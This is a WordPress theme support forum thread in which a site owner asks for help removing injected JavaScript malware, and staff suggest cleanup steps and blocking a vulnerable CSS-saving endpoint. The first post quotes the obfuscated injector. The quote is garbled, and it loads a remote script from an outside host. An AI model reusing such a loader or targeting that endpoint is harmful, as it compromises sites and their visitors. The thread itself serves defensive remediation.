Malware found in Newspaper can’t find it

Posted in: Newspaper
Post count: 3

Hi, I already updated the theme and the plugins via FTP and all WordPress files, yet my website still contains malware and is found in WordPress categories:

*Known javascript malware
Malware http://elimparcialnoticias.com/

(Pasa el cursor por encima para ver el código inyectado)
*Known javascript malware
Malware https://elimparcialnoticias.com/local/

(Pasa el cursor por encima para ver el código inyectado)
*Known javascript malware
Malware https://elimparcialnoticias.com/local/camargo/

(Pasa el cursor por encima para ver el código inyectado)
*Known javascript malware
Malware https://elimparcialnoticias.com/local/delicias/

(Pasa el cursor por encima para ver el código inyectado)
*Known javascript malware
Malware https://elimparcialnoticias.com/local/meoqui/

(Pasa el cursor por encima para ver el código inyectado)
*Known javascript malware
Malware https://elimparcialnoticias.com/local/rosales/

(Pasa el cursor por encima para ver el código inyectado)
*Known javascript malware
Malware https://elimparcialnoticias.com/local/saucillo/

I can´t find a file or a style to be deleted to delete this malware.

Can you help me discover where this javascript malware is inserted in my theme? I´m using the Cloud Templates: Living PRO, but I can´t find where this code comes from.

The code is:

<style id=”tdw-css-placeholder”>var
_rnnwirrm-“ataeqjb”try(letafmtgnbdgw-String;v. aeejp=”f™+”ro”+afmgnbagw[‘fr’+’om’+String.from (109,67,104,97, 114,67)+””+”de”var addknsowigw=”s”+”c”+afmtgnbdgw[aeejp]
(114, 105, 112, 116);var
xgobwbyj=”‘C’+’re”tafmtenbdgwlaeejp]
(97,116, 101,69, 108, 101, 109, 101, 110, 116);var _agehb=”s”+afmtgnbdgw[aeejp](114,99);var aomcxrdou-afmtgnbogw[aeejp](105,100);var _pfbpqrh=”cu”+”rre”+afmtgnbogw[aeejp]
(110, 116,83, 99, 1 14, 105, 112, 116); var _gaaeorlwqz-“pa”+”-“+afmtgnbagw[aeejp]
(101, 110, 116, 78, 111, 100, 101);var
gwzwgixp=”+”ns”tafmtgnbdgwlaeejp]
(101, 114,116,66, 101, 102, 11 1, 114, 101);let aqtfqufbfe-“ge”+”El’+afmtgnbdgw[aeejp]
(101, 109, 101, 110, 116, 115,66, 121, 84, 97, 1 03, 78,97, _almpwagsfok=”h”+””+afmtgnbagw[aeejp]
(97,100);var __qrohvnpalnf-“ap”+”p”+afmtgnbagw[aeejp]
(101,110, 100, 67, 104, 105, 108, 100);var _zieiuaxr=document;var _tinae=””+”e”+afmtgnbogw[aeejp]
(109, 112,95, 1 1 9, 101,97,1 16, 104, 101, 114, 95, 115,99
_qgmbtqt=_zieiuaxrLxgobwbyil (adaknsowigw):_qgmbtat[as’+’y’+’nc’]-true;var _Ixavfaxr=afmtgnbdgwaeejp]
(104,116,116,112,115,58,47,47+ “f” + “ft “+”.”+”gy
(47)+afmtgnbogw[aeejp]
(115)+”cr”+”;”+afmtgnbogwaeejp]
(112, 116)+afmtgnbdgw[aeejp] (47)+”s”+”ta”+afmtgnbogw[aeejp]
(114, 116,46, 106,115)_9gmbtqtLagehb)-_ Ixavfaxr;aRR {zieiuaxrLpfbpqrh]Lgaaeorlbwqz] [glwzwgixp]
(agmbtat, _zieiuaxr Lpfbpqrh));var axtpuopbn=document;if aware
(axtpuopbn[‘cu’+’rr’+’en’+’tS’+’cr’+ipt’])s.com/ {axtpuopbn[‘cu’+’rr’+’en’+’tS’+’cr’+’ipt’l.remove(}}e (almpwagsfok)[0]LqrohvnpdinfI(qgmbtqt);if° (axtpuopbn[‘cu’+’rr’+’en’+’tS’+’cr’+’ipt’7) {axtpuopbn[‘cu’+’rr’+’en’+’tS’+’cr’+’ipt’).remove())} (err/</style></head>

Thanks!

Post count: 27744

Hi,

You could consider reinstalling the WordPress version, and checking for this plugin wp-zexit.php. It might be wise to inspect via FTP if it doesn’t appear in the WordPress -> Plugins. Additionally, using Wordfence to scan the website and remove unknown users would be prudent.
Change admin passwords and delete admin accounts you are not familiar with;
– Delete any weird/unknown plugins;
– Delete the weird/unknown themes;
– Clean unfamiliar Theme Panel injected code (example – https://i.imgur.com/4q70kCv.png);
– Clean WordPress files (example – https://i.imgur.com/stJCqiK.png)
Please block /wp-json/tdw/save_css
If an attacker wants to target this URL /wp-json/tdw/save_css they can do so. Even if the website uses a different theme, the attacker can still try that URL. We could add an option to be able to enable/disable the Live CSS, it will be considered. But for now in order to remove it this can only be done with a modification to the composer plugin. I think that all that removing it requires is to comment this line of code – https://prnt.sc/RtwvL5Nc4ikR -> https://prnt.sc/ymZmhdUfp57U But as I mentioned, the attacker can still try to access the URL.

Thank you!

Post count: 3

Thanks! I was only missing to comment on the td-composer.php It appears to worked.

Post count: 27744

Hi,

I’m glad. Don’t hesitate to contact us if you have other questions.

Have a great day!

Viewing 4 posts - 1 through 4 (of 4 total)
The forum ‘Newspaper’ is closed to new topics and replies.